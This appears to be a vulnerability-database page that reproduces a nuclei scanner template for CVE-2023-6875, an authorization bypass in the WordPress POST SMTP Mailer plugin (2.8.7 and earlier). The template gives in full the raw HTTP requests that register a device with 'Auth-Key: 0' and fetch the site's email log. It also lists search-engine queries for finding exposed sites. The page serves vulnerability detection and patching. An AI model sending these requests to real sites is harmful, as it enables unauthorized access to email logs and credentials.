Lucene search
K

WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 74 Views

WordPress POST SMTP Mailer <= 2.8.7 - Auth Bypas

Related
Refs
Code
id: CVE-2023-6875

info:
  name: WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.
  impact: |
    Unauthenticated attackers can exploit type juggling vulnerabilities in the connect-app REST endpoint to access and modify sensitive email configuration data.
  remediation: Fixed in 2.8.8
  reference:
    - https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Mobile/includes/rest-api/v1/rest-api.php#L60
    - https://plugins.trac.wordpress.org/changeset/3016051/post-smtp/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6875
    - https://github.com/UlyssesSaicha/CVE-2023-6875
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6875
    cwe-id: CWE-862
    epss-score: 0.90339
    epss-percentile: 0.99785
    cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wpexperts
    product: post_smtp_mailer
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/post-smtp
    fofa-query: body=/wp-content/plugins/post-smtp
    publicwww-query: "/wp-content/plugins/post-smtp"
  tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass,wpexperts,vkev,vuln
variables:
  fcm_token: "{{randstr_1}}"
  device: "{{randstr_2}}"

http:
  - raw:
      - |
        POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
        Host: {{Hostname}}
        Auth-Key: 0
        Device: {{device}}
        Fcm-Token: {{fcm_token}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
        Host: {{Hostname}}
        Auth-Key: 0
        Device: {{device}}
        Fcm-Token: {{fcm_token}}
        Content-Type: application/x-www-form-urlencoded

      - |
        GET /wp-json/post-smtp/v1/get-log HTTP/1.1
        Host: {{Hostname}}
        Auth-Key: 0
        Device: {{device}}
        Fcm-Token: {{fcm_token}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")'
          - 'contains_all(body_3, "true,\"data\":", "access_token=")'
        condition: and
# digest: 4a0a004730450221008b9525d1cf778bda80082d2202aa1501653706c049d37002ff7cf73263544095022034b6226f618edc2e6f92a2b7c9282cad8d62e43d10eab7153aa1d182f3eb634a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.90339
SSVC
74